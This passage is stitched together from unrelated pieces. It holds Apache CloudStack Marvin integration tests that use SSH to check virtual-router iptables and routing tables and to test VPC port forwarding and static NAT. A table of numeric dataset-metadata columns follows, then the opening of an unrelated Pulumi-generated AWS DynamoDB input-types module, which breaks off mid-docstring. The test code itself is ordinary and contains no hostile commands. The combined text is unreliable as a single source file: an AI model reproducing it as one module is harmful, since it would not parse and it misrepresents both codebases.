                self.apiclient.connection.passwd,
                router.linklocalip,
                'ip route list table Table_eth3',
                hypervisor=self.hypervisor
            )
        else:
            hosts = list_hosts(
                self.apiclient,
                id=router.hostid,
            )
            self.assertEqual(
                isinstance(hosts, list),
                True,
                "Check for list hosts response return valid data"
            )
            host = hosts[0]
            host.user = self.hostConfig['username']
            host.passwd = self.hostConfig['password']
            try:
                result = get_process_status(
                    host.ipaddress,
                    22,
                    host.user,
                    host.passwd,
                    router.linklocalip,
                    'ip route list table Table_eth3'
                )
            except KeyError:
                self.skipTest(
                    "Provide a marvin config file with host\
                            credentials to run %s" %
                    self._testMethodName)
        logger.debug("ip route list table Table_eth3: %s" % result)
        res = str(result)
        self.assertEqual(
            res.count("default via"),
            0,
            "Check to ensure there should not be any default rule"
        )
        self.assertEqual(
            res.count("throw"),
            0,
            "Check to ensure there should not be any throw rule"
        )
class TestIptables(cloudstackTestCase):
    """Verify iptables FORWARD-chain rules on the virtual router when a public IP
    from an additional (non source-NAT) public IP range is associated with a network.
    """

    @classmethod
    def setUpClass(cls):
        """Create class-wide fixtures: API client, zone/domain lookups, account,
        service offering and one VM that all tests in this class share."""
        testClient = super(TestIptables, cls).getClsTestClient()
        cls.apiclient = testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        cls.hypervisor = testClient.getHypervisorInfo()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.apiclient)
        cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
        cls.services["virtual_machine"]["zoneid"] = cls.zone.id
        cls.services["zoneid"] = cls.zone.id
        template = get_template(
            cls.apiclient,
            cls.zone.id,
            cls.services["ostype"]
        )
        if template == FAILED:
            assert False, "get_template() failed to return template with description %s" % cls.services[
                "ostype"]
        # Create an account, network, VM and IP addresses
        cls.account = Account.create(
            cls.apiclient,
            cls.services["account"],
            admin=True,
            domainid=cls.domain.id
        )
        cls.services["publiciprange"]["zoneid"] = cls.zone.id
        cls.service_offering = ServiceOffering.create(
            cls.apiclient,
            cls.services["service_offerings"]["tiny"]
        )
        # SSH credentials of the first host of the first cluster in the marvin config;
        # used later to reach the router through its host (non-VMware/Hyper-V path).
        cls.hostConfig = cls.config.__dict__["zones"][0].__dict__["pods"][0].__dict__["clusters"][0].__dict__["hosts"][0].__dict__
        cls.virtual_machine = VirtualMachine.create(
            cls.apiclient,
            cls.services["virtual_machine"],
            templateid=template.id,
            accountid=cls.account.name,
            domainid=cls.account.domainid,
            serviceofferingid=cls.service_offering.id
        )
        # Resources destroyed once for the whole class in tearDownClass.
        cls._cleanup = [
            cls.virtual_machine,
            cls.account,
            cls.service_offering
        ]

    def setUp(self):
        """Per-test setup: fresh API client and an empty per-test cleanup list."""
        self.apiclient = self.testClient.getApiClient()
        self.cleanup = []
        return

    @classmethod
    def tearDownClass(cls):
        """Release the class-wide resources accumulated in cls._cleanup."""
        try:
            cls.apiclient = super(
                TestIptables,
                cls).getClsTestClient().getApiClient()
            cleanup_resources(cls.apiclient, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)

    def tearDown(self):
        """Release resources created by the individual test."""
        cleanup_resources(self.apiclient, self.cleanup)
        return

    @attr(tags=["advanced", "smoke"], required_hardware="true")
    def test_iptable_rules(self):
        """Test iptable rules in case we have IP associated with a network which is in
        different pubic IP range from that of public IP range that has source NAT IP.
        When IP is associated we should see a rule '-i eth3 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT' in FORWARD table.
        When IP is dis-associated we should see a rule in the FORWARD table is deleted.
        """
        # Validate the following:
        # 1. Create a new public IP range and dedicate to a account
        # 2. Acquire a IP from new public range
        # 3. Create a firewall rule to open up the port, so that IP is associated with network
        # 5. Login to VR and verify routing tables, there should be Table_eth3
        # 6. Delete firewall rule, since its last IP, routing table Table_eth3 should be deleted
        self.public_ip_range = PublicIpRange.create(
            self.apiclient,
            self.services["publiciprange"]
        )
        # NOTE(review): appended to the class-level _cleanup list, so the range is
        # only released in tearDownClass, not in this test's tearDown.
        self._cleanup.append(self.public_ip_range)
        logger.debug("Dedicating Public IP range to the account");
        # NOTE(review): response object is not inspected afterwards.
        dedicate_public_ip_range_response = PublicIpRange.dedicate(
            self.apiclient,
            self.public_ip_range.vlan.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        ip_address = PublicIPAddress.create(
            self.apiclient,
            self.account.name,
            self.zone.id,
            self.account.domainid,
            self.services["virtual_machine"]
        )
        self.cleanup.append(ip_address)
        # Check if VM is in Running state before creating NAT and firewall rules
        vm_response = VirtualMachine.list(
            self.apiclient,
            id=self.virtual_machine.id
        )
        self.assertEqual(
            isinstance(vm_response, list),
            True,
            "Check list VM returns a valid list"
        )
        self.assertNotEqual(
            len(vm_response),
            0,
            "Check Port Forwarding Rule is created"
        )
        self.assertEqual(
            vm_response[0].state,
            'Running',
            "VM state should be Running before creating a NAT rule."
        )
        # Open up firewall port for SSH
        firewall_rule = FireWallRule.create(
            self.apiclient,
            ipaddressid=ip_address.ipaddress.id,
            protocol=self.services["natrule"]["protocol"],
            cidrlist=['0.0.0.0/0'],
            startport=self.services["natrule"]["publicport"],
            endport=self.services["natrule"]["publicport"]
        )
        # Get the router details associated with account
        routers = list_routers(
            self.apiclient,
            account=self.account.name,
            domainid=self.account.domainid,
        )
        router = routers[0]
        # On VMware/Hyper-V the router is reached via the management server;
        # on other hypervisors it is reached through the host it runs on.
        if (self.hypervisor.lower() == 'vmware'
                or self.hypervisor.lower() == 'hyperv'):
            result = get_process_status(
                self.apiclient.connection.mgtSvr,
                22,
                self.apiclient.connection.user,
                self.apiclient.connection.passwd,
                router.linklocalip,
                'iptables -t filter -L FORWARD -v',
                hypervisor=self.hypervisor
            )
        else:
            hosts = list_hosts(
                self.apiclient,
                id=router.hostid,
            )
            self.assertEqual(
                isinstance(hosts, list),
                True,
                "Check for list hosts response return valid data"
            )
            host = hosts[0]
            host.user = self.hostConfig['username']
            host.passwd = self.hostConfig['password']
            # KeyError here means the marvin config lacks host credentials.
            try:
                result = get_process_status(
                    host.ipaddress,
                    22,
                    host.user,
                    host.passwd,
                    router.linklocalip,
                    'iptables -t filter -L FORWARD -v'
                )
            except KeyError:
                self.skipTest(
                    "Provide a marvin config file with host\
                    credentials to run %s" %
                    self._testMethodName)
        logger.debug("iptables -t filter -L FORWARD -v: %s" % result)
        res = str(result)
        # Exactly one RELATED,ESTABLISHED accept rule between eth3 and eth0 is expected.
        self.assertEqual(
            res.count("eth3 eth0 anywhere anywhere state RELATED,ESTABLISHED"),
            1,
            "Check to ensure there is a iptable rule to accept the RELATED,ESTABLISHED traffic"
        )
        firewall_rule.delete(self.apiclient)
class TestVPCPortForwarding(cloudstackTestCase):
    """Port-forwarding test for a VPC whose public IP is acquired from a
    dedicated, account-owned public IP range."""

    @classmethod
    def setUpClass(cls):
        """Create class-wide fixtures: API client, zone/domain/template lookups,
        offering definitions and the shared service offering."""
        socket.setdefaulttimeout(60)
        testClient = super(TestVPCPortForwarding, cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.services["ostype"]
        )
        # Inline offering definitions used by every test in this class.
        cls.services["vpc_offering"] = { "name": 'VPC off',
                                         "displaytext": 'VPC off',
                                         "supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Lb,UserData,StaticNat',
                                         }
        cls.services["network_offering"] = {
            "name": 'VPC Network offering',
            "displaytext": 'VPC Network off',
            "guestiptype": 'Isolated',
            "supportedservices": 'Vpn,Dhcp,Dns,SourceNat,PortForwarding,Lb,UserData,StaticNat,NetworkACL',
            "traffictype": 'GUEST',
            "availability": 'Optional',
            "useVpc": 'on',
            "serviceProviderList": {
                "Vpn": 'VpcVirtualRouter',
                "Dhcp": 'VpcVirtualRouter',
                "Dns": 'VpcVirtualRouter',
                "SourceNat": 'VpcVirtualRouter',
                "PortForwarding": 'VpcVirtualRouter',
                "Lb": 'VpcVirtualRouter',
                "UserData": 'VpcVirtualRouter',
                "StaticNat": 'VpcVirtualRouter',
                "NetworkACL": 'VpcVirtualRouter'
            },
        }
        cls.services["network"] = {
            "name": "Test Network",
            "displaytext": "Test Network",
            "netmask": '255.255.255.0'
        }
        cls.services["virtual_machine"]["zoneid"] = cls.zone.id
        cls.services["virtual_machine"]["template"] = cls.template.id
        cls.services["publiciprange"]["zoneid"] = cls.zone.id
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.services["service_offering"]
        )
        # Class-wide resources released once in tearDownClass.
        cls._cleanup = [cls.service_offering]
        return

    @classmethod
    def tearDownClass(cls):
        """Release the class-wide resources accumulated in cls._cleanup."""
        try:
            #Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    def setUp(self):
        """Per-test setup: fresh account, an enabled VPC offering and a VPC."""
        self.apiclient = self.testClient.getApiClient()
        self.account = Account.create(
            self.apiclient,
            self.services["account"],
            admin=True,
            domainid=self.domain.id
        )
        self.cleanup = [self.account]
        logger.debug("Creating a VPC offering..")
        self.vpc_off = VpcOffering.create(
            self.apiclient,
            self.services["vpc_offering"]
        )
        # NOTE(review): appended to the class-level _cleanup list, so the offering
        # is only deleted in tearDownClass, not in this test's tearDown.
        self._cleanup.append(self.vpc_off)
        logger.debug("Enabling the VPC offering created")
        self.vpc_off.update(self.apiclient, state='Enabled')
        logger.debug("Creating a VPC network in the account: %s" % self.account.name)
        self.services["vpc"]["cidr"] = '10.1.0.0/16'
        self.vpc = VPC.create(
            self.apiclient,
            self.services["vpc"],
            vpcofferingid=self.vpc_off.id,
            zoneid=self.zone.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        return

    def tearDown(self):
        """Release per-test resources (best-effort: failures are only logged)."""
        try:
            #Clean up, terminate the created network offerings
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            logger.debug("Warning: Exception during cleanup : %s" % e)
        return

    def check_ssh_into_vm(self, vm, public_ip, testnegative=False):
        """Assert SSH reachability of *vm* via *public_ip*.

        With testnegative=False the test fails if SSH fails; with
        testnegative=True the test fails if SSH succeeds.
        """
        logger.debug("Checking if we can SSH into VM=%s on public_ip=%s" % (vm.name, public_ip.ipaddress.ipaddress))
        # NOTE(review): bare except intentionally treats any SSH error as "not reachable".
        try:
            vm.get_ssh_client(ipaddress=public_ip.ipaddress.ipaddress)
            if not testnegative:
                logger.debug("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
            else:
                self.fail("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
        except:
            if not testnegative:
                self.fail("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))
            else:
                logger.debug("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))

    def create_natrule(self, vm, public_ip, network, services=None):
        """Create and return a NAT (port-forwarding) rule for *vm* on *public_ip*
        in *network*, defaulting to the configured "natrule" service data."""
        logger.debug("Creating NAT rule in network for vm with public IP")
        if not services:
            services = self.services["natrule"]
        nat_rule = NATRule.create(self.apiclient,
                                  vm,
                                  services,
                                  ipaddressid=public_ip.ipaddress.id,
                                  openfirewall=False,
                                  networkid=network.id,
                                  vpcid=self.vpc.id
                                  )
        return nat_rule

    def acquire_publicip(self, network):
        """Acquire and return a public IP associated with *network* in this VPC."""
        logger.debug("Associating public IP for network: %s" % network.name)
        public_ip = PublicIPAddress.create(self.apiclient,
                                           accountid=self.account.name,
                                           zoneid=self.zone.id,
                                           domainid=self.account.domainid,
                                           networkid=network.id,
                                           vpcid=self.vpc.id
                                           )
        logger.debug("Associated %s with network %s" % (public_ip.ipaddress.ipaddress,
                                                        network.id
                                                        ))
        return public_ip

    def create_network(self, net_offerring, gateway='10.1.1.1',vpc=None):
        """Create (and enable) a network offering from *net_offerring*, then create
        and return a VPC tier using it, attached to the "default_allow" ACL.

        Fails the test on any error.
        """
        try:
            logger.debug('Create NetworkOffering')
            net_offerring["name"] = "NET_OFF-" + str(gateway)
            nw_off = NetworkOffering.create(self.apiclient,
                                            net_offerring,
                                            conservemode=False
                                            )
            # Enable Network offering
            nw_off.update(self.apiclient, state='Enabled')
            self._cleanup.append(nw_off)
            logger.debug('Created and Enabled NetworkOffering')
            self.services["network"]["name"] = "NETWORK-" + str(gateway)
            logger.debug('Adding Network=%s' % self.services["network"])
            default_acl = NetworkACLList.list(self.apiclient, name="default_allow")[0]
            obj_network = Network.create(self.apiclient,
                                         self.services["network"],
                                         accountid=self.account.name,
                                         domainid=self.account.domainid,
                                         networkofferingid=nw_off.id,
                                         zoneid=self.zone.id,
                                         gateway=gateway,
                                         aclid=default_acl.id,
                                         vpcid=vpc.id if vpc else self.vpc.id
                                         )
            logger.debug("Created network with ID: %s" % obj_network.id)
            return obj_network
        except Exception as e:
            self.fail('Unable to create a Network with offering=%s because of %s ' % (net_offerring, e))

    def deployvm_in_network(self, network, host_id=None):
        """Deploy and return a VM in *network* (optionally pinned to *host_id*).

        Fails the test on any error.
        """
        try:
            logger.debug('Creating VM in network=%s' % network.name)
            vm = VirtualMachine.create(
                self.apiclient,
                self.services["virtual_machine"],
                accountid=self.account.name,
                domainid=self.account.domainid,
                serviceofferingid=self.service_offering.id,
                networkids=[str(network.id)],
                hostid=host_id
            )
            logger.debug('Created VM=%s in network=%s' % (vm.id, network.name))
            return vm
        except:
            self.fail('Unable to create VM in a Network=%s' % network.name)

    @attr(tags=["advanced", "intervlan"], required_hardware="true")
    def test_network_services_VPC_CreatePF(self):
        """ Test Create VPC PF rules on acquired public ip when VpcVirtualRouter is Running
        """
        # Validate the following
        # 1. Create a VPC with cidr - 10.1.1.1/16
        # 2. Create a Network offering - NO1 with all supported services
        # 3. Add network1(10.1.1.1/24) using N01 to this VPC.
        # 4. Deploy vm1 in network1.
        # 5. Use the Create PF rule for vm in network1.
        # 6. Successfully ssh into the Guest VM using the PF rule
        network_1 = self.create_network(self.services["network_offering"])
        vm_1 = self.deployvm_in_network(network_1)
        self.public_ip_range = PublicIpRange.create(
            self.apiclient,
            self.services["publiciprange"]
        )
        self._cleanup.append(self.public_ip_range)
        logger.debug("Dedicating Public IP range to the account");
        # NOTE(review): response object is not inspected afterwards.
        dedicate_public_ip_range_response = PublicIpRange.dedicate(
            self.apiclient,
            self.public_ip_range.vlan.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        public_ip_1 = self.acquire_publicip(network_1)
        self.create_natrule( vm_1, public_ip_1, network_1)
        self.check_ssh_into_vm(vm_1, public_ip_1, testnegative=False)
        self.public_ip_range.release(self.apiclient)
        return
class TestVPCStaticNat(cloudstackTestCase):
    """Static-NAT test for a VPC whose public IP is acquired from a dedicated,
    account-owned public IP range. Mirrors TestVPCPortForwarding but enables
    static NAT instead of creating a port-forwarding rule."""

    @classmethod
    def setUpClass(cls):
        """Create class-wide fixtures: API client, zone/domain/template lookups,
        offering definitions and the shared service offering."""
        socket.setdefaulttimeout(60)
        testClient = super(TestVPCStaticNat, cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.services["ostype"]
        )
        # Inline offering definitions used by every test in this class.
        cls.services["vpc_offering"] = { "name": 'VPC off',
                                         "displaytext": 'VPC off',
                                         "supportedservices": 'Dhcp,Dns,SourceNat,PortForwarding,Vpn,Lb,UserData,StaticNat',
                                         }
        cls.services["network_offering"] = {
            "name": 'VPC Network offering',
            "displaytext": 'VPC Network off',
            "guestiptype": 'Isolated',
            "supportedservices": 'Vpn,Dhcp,Dns,SourceNat,PortForwarding,Lb,UserData,StaticNat,NetworkACL',
            "traffictype": 'GUEST',
            "availability": 'Optional',
            "useVpc": 'on',
            "serviceProviderList": {
                "Vpn": 'VpcVirtualRouter',
                "Dhcp": 'VpcVirtualRouter',
                "Dns": 'VpcVirtualRouter',
                "SourceNat": 'VpcVirtualRouter',
                "PortForwarding": 'VpcVirtualRouter',
                "Lb": 'VpcVirtualRouter',
                "UserData": 'VpcVirtualRouter',
                "StaticNat": 'VpcVirtualRouter',
                "NetworkACL": 'VpcVirtualRouter'
            },
        }
        cls.services["network"] = {
            "name": "Test Network",
            "displaytext": "Test Network",
            "netmask": '255.255.255.0'
        }
        cls.services["virtual_machine"]["zoneid"] = cls.zone.id
        cls.services["virtual_machine"]["template"] = cls.template.id
        cls.services["publiciprange"]["zoneid"] = cls.zone.id
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.services["service_offering"]
        )
        # Class-wide resources released once in tearDownClass.
        cls._cleanup = [cls.service_offering]
        return

    @classmethod
    def tearDownClass(cls):
        """Release the class-wide resources accumulated in cls._cleanup."""
        try:
            #Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return

    def setUp(self):
        """Per-test setup: fresh account, an enabled VPC offering and a VPC."""
        self.apiclient = self.testClient.getApiClient()
        self.account = Account.create(
            self.apiclient,
            self.services["account"],
            admin=True,
            domainid=self.domain.id
        )
        self.cleanup = [self.account]
        logger.debug("Creating a VPC offering..")
        self.vpc_off = VpcOffering.create(
            self.apiclient,
            self.services["vpc_offering"]
        )
        # NOTE(review): appended to the class-level _cleanup list, so the offering
        # is only deleted in tearDownClass, not in this test's tearDown.
        self._cleanup.append(self.vpc_off)
        logger.debug("Enabling the VPC offering created")
        self.vpc_off.update(self.apiclient, state='Enabled')
        logger.debug("Creating a VPC network in the account: %s" % self.account.name)
        self.services["vpc"]["cidr"] = '10.1.0.0/16'
        self.vpc = VPC.create(
            self.apiclient,
            self.services["vpc"],
            vpcofferingid=self.vpc_off.id,
            zoneid=self.zone.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        return

    def tearDown(self):
        """Release per-test resources (best-effort: failures are only logged)."""
        try:
            #Clean up, terminate the created network offerings
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            logger.debug("Warning: Exception during cleanup : %s" % e)
        return

    def check_ssh_into_vm(self, vm, public_ip, testnegative=False):
        """Assert SSH reachability of *vm* via *public_ip*.

        With testnegative=False the test fails if SSH fails; with
        testnegative=True the test fails if SSH succeeds.
        """
        logger.debug("Checking if we can SSH into VM=%s on public_ip=%s" % (vm.name, public_ip.ipaddress.ipaddress))
        # NOTE(review): bare except intentionally treats any SSH error as "not reachable".
        try:
            vm.get_ssh_client(ipaddress=public_ip.ipaddress.ipaddress)
            if not testnegative:
                logger.debug("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
            else:
                self.fail("SSH into VM=%s on public_ip=%s is successfully" % (vm.name, public_ip.ipaddress.ipaddress))
        except:
            if not testnegative:
                self.fail("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))
            else:
                logger.debug("Failed to SSH into VM - %s" % (public_ip.ipaddress.ipaddress))

    def acquire_publicip(self, network):
        """Acquire and return a public IP associated with *network* in this VPC."""
        logger.debug("Associating public IP for network: %s" % network.name)
        public_ip = PublicIPAddress.create(self.apiclient,
                                           accountid=self.account.name,
                                           zoneid=self.zone.id,
                                           domainid=self.account.domainid,
                                           networkid=network.id,
                                           vpcid=self.vpc.id
                                           )
        logger.debug("Associated %s with network %s" % (public_ip.ipaddress.ipaddress,
                                                        network.id
                                                        ))
        return public_ip

    def create_network(self, net_offerring, gateway='10.1.1.1',vpc=None):
        """Create (and enable) a network offering from *net_offerring*, then create
        and return a VPC tier using it, attached to the "default_allow" ACL.

        Fails the test on any error.
        """
        try:
            logger.debug('Create NetworkOffering')
            net_offerring["name"] = "NET_OFF-" + str(gateway)
            nw_off = NetworkOffering.create(self.apiclient,
                                            net_offerring,
                                            conservemode=False
                                            )
            # Enable Network offering
            nw_off.update(self.apiclient, state='Enabled')
            self._cleanup.append(nw_off)
            logger.debug('Created and Enabled NetworkOffering')
            self.services["network"]["name"] = "NETWORK-" + str(gateway)
            logger.debug('Adding Network=%s' % self.services["network"])
            default_acl = NetworkACLList.list(self.apiclient, name="default_allow")[0]
            obj_network = Network.create(self.apiclient,
                                         self.services["network"],
                                         accountid=self.account.name,
                                         domainid=self.account.domainid,
                                         networkofferingid=nw_off.id,
                                         zoneid=self.zone.id,
                                         gateway=gateway,
                                         aclid=default_acl.id,
                                         vpcid=vpc.id if vpc else self.vpc.id
                                         )
            logger.debug("Created network with ID: %s" % obj_network.id)
            return obj_network
        except Exception as e:
            self.fail('Unable to create a Network with offering=%s because of %s ' % (net_offerring, e))

    def deployvm_in_network(self, network, host_id=None):
        """Deploy and return a VM in *network* (optionally pinned to *host_id*).

        Fails the test on any error.
        """
        try:
            logger.debug('Creating VM in network=%s' % network.name)
            vm = VirtualMachine.create(
                self.apiclient,
                self.services["virtual_machine"],
                accountid=self.account.name,
                domainid=self.account.domainid,
                serviceofferingid=self.service_offering.id,
                networkids=[str(network.id)],
                hostid=host_id
            )
            logger.debug('Created VM=%s in network=%s' % (vm.id, network.name))
            return vm
        except:
            self.fail('Unable to create VM in a Network=%s' % network.name)

    def create_StaticNatRule_For_VM(self, vm, public_ip, network, services=None):
        """Enable static NAT mapping *public_ip* to *vm* in *network*.

        Fails the test on any error.
        """
        logger.debug("Enabling static NAT for IP: %s" %public_ip.ipaddress.ipaddress)
        # NOTE(review): *services* is defaulted here but never used afterwards.
        if not services:
            services = self.services["natrule"]
        try:
            StaticNATRule.enable(
                self.apiclient,
                ipaddressid=public_ip.ipaddress.id,
                virtualmachineid=vm.id,
                networkid=network.id
            )
            logger.debug("Static NAT enabled for IP: %s" %
                         public_ip.ipaddress.ipaddress)
            logger.debug("Adding NetworkACL rules to make NAT rule accessible")
        except Exception as e:
            self.fail("Failed to enable static NAT on IP: %s - %s" % (
                public_ip.ipaddress.ipaddress, e))

    @attr(tags=["advanced", "intervlan"], required_hardware="true")
    def test_network_services_VPC_CreatePF(self):
        """ Test Create VPC PF rules on acquired public ip when VpcVirtualRouter is Running
        """
        # Validate the following
        # 1. Create a VPC with cidr - 10.1.1.1/16
        # 2. Create a Network offering - NO1 with all supported services
        # 3. Add network1(10.1.1.1/24) using N01 to this VPC.
        # 4. Deploy vm1 in network1.
        # 5. Use the Create PF rule for vm in network1.
        # 6. Successfully ssh into the Guest VM using the PF rule
        network_1 = self.create_network(self.services["network_offering"])
        vm_1 = self.deployvm_in_network(network_1)
        self.public_ip_range = PublicIpRange.create(
            self.apiclient,
            self.services["publiciprange"]
        )
        self._cleanup.append(self.public_ip_range)
        logger.debug("Dedicating Public IP range to the account");
        # NOTE(review): response object is not inspected afterwards.
        dedicate_public_ip_range_response = PublicIpRange.dedicate(
            self.apiclient,
            self.public_ip_range.vlan.id,
            account=self.account.name,
            domainid=self.account.domainid
        )
        public_ip_1 = self.acquire_publicip(network_1)
        self.create_StaticNatRule_For_VM( vm_1, public_ip_1, network_1)
        self.check_ssh_into_vm(vm_1, public_ip_1, testnegative=False)
        self.public_ip_range.release(self.apiclient)
        return
| 41.996169
| 137
| 0.516741
| 5,130
| 54,805
| 5.418908
| 0.0846
| 0.025612
| 0.020576
| 0.012842
| 0.886507
| 0.880931
| 0.872729
| 0.855498
| 0.854419
| 0.844383
| 0
| 0.006881
| 0.40073
| 54,805
| 1,304
| 138
| 42.028374
| 0.83954
| 0.093477
| 0
| 0.80093
| 0
| 0.00093
| 0.133703
| 0.00522
| 0
| 0
| 0
| 0
| 0.022326
| 1
| 0.037209
| false
| 0.008372
| 0.012093
| 0
| 0.07814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37cf77fc741601aa6e077dbfe6167357d096dbf3
| 15,864
|
py
|
Python
|
sdk/python/pulumi_aws/dynamodb/_inputs.py
|
jen20/pulumi-aws
|
172e00c642adc03238f89cc9c5a16b914a77c2b1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dynamodb/_inputs.py
|
jen20/pulumi-aws
|
172e00c642adc03238f89cc9c5a16b914a77c2b1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dynamodb/_inputs.py
|
jen20/pulumi-aws
|
172e00c642adc03238f89cc9c5a16b914a77c2b1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities, _tables
__all__ = [
'GlobalTableReplicaArgs',
'TableAttributeArgs',
'TableGlobalSecondaryIndexArgs',
'TableLocalSecondaryIndexArgs',
'TablePointInTimeRecoveryArgs',
'TableReplicaArgs',
'TableServerSideEncryptionArgs',
'TableTtlArgs',
'GetTableServerSideEncryptionArgs',
]
@pulumi.input_type
class GlobalTableReplicaArgs:
    def __init__(__self__, *,
                 region_name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] region_name: AWS region that hosts the replica DynamoDB table, e.g. `us-east-1`
        """
        pulumi.set(__self__, "region_name", region_name)

    @property
    @pulumi.getter(name="regionName")
    def region_name(self) -> pulumi.Input[str]:
        """
        AWS region that hosts the replica DynamoDB table, e.g. `us-east-1`.
        """
        return pulumi.get(self, "region_name")

    @region_name.setter
    def region_name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "region_name", new_value)
@pulumi.input_type
class TableAttributeArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 type: pulumi.Input[str]):
        """
        :param pulumi.Input[str] name: The name of the index
        :param pulumi.Input[str] type: Attribute type; one of the scalar types `S` ((S)tring), `N` ((N)umber) or `B` ((B)inary)
        """
        # Store both required attributes on the input object.
        for key, val in (("name", name), ("type", type)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the index.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "name", new_value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        Attribute type; one of the scalar types `S` ((S)tring), `N` ((N)umber) or `B` ((B)inary).
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "type", new_value)
@pulumi.input_type
class TableGlobalSecondaryIndexArgs:
    def __init__(__self__, *,
                 hash_key: pulumi.Input[str],
                 name: pulumi.Input[str],
                 projection_type: pulumi.Input[str],
                 non_key_attributes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 range_key: Optional[pulumi.Input[str]] = None,
                 read_capacity: Optional[pulumi.Input[int]] = None,
                 write_capacity: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[str] hash_key: Name of the index hash key; it must be
               declared as an attribute on the resource.
        :param pulumi.Input[str] name: The name of the index
        :param pulumi.Input[str] projection_type: `ALL`, `INCLUDE` or `KEYS_ONLY`:
               `ALL` projects every attribute, `KEYS_ONLY` projects only the hash
               and range keys, and `INCLUDE` projects only the attributes listed in
               _non_key_attributes_.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] non_key_attributes: Attributes to project into the
               index; required only when the projection type is `INCLUDE`. They need
               not be declared as attributes on the table.
        :param pulumi.Input[str] range_key: Name of the range key; must be defined
        :param pulumi.Input[int] read_capacity: Read units for this index; required when billing_mode is PROVISIONED.
        :param pulumi.Input[int] write_capacity: Write units for this index; required when billing_mode is PROVISIONED.
        """
        # Required fields are always stored.
        for key, val in (("hash_key", hash_key),
                         ("name", name),
                         ("projection_type", projection_type)):
            pulumi.set(__self__, key, val)
        # Optional fields are stored only when supplied.
        for key, val in (("non_key_attributes", non_key_attributes),
                         ("range_key", range_key),
                         ("read_capacity", read_capacity),
                         ("write_capacity", write_capacity)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="hashKey")
    def hash_key(self) -> pulumi.Input[str]:
        """
        Name of the index hash key; it must be declared as an attribute on the resource.
        """
        return pulumi.get(self, "hash_key")

    @hash_key.setter
    def hash_key(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "hash_key", new_value)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The name of the index.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "name", new_value)

    @property
    @pulumi.getter(name="projectionType")
    def projection_type(self) -> pulumi.Input[str]:
        """
        `ALL`, `INCLUDE` or `KEYS_ONLY`: `ALL` projects every attribute,
        `KEYS_ONLY` projects only the hash and range keys, and `INCLUDE`
        projects only the attributes listed in _non_key_attributes_.
        """
        return pulumi.get(self, "projection_type")

    @projection_type.setter
    def projection_type(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "projection_type", new_value)

    @property
    @pulumi.getter(name="nonKeyAttributes")
    def non_key_attributes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
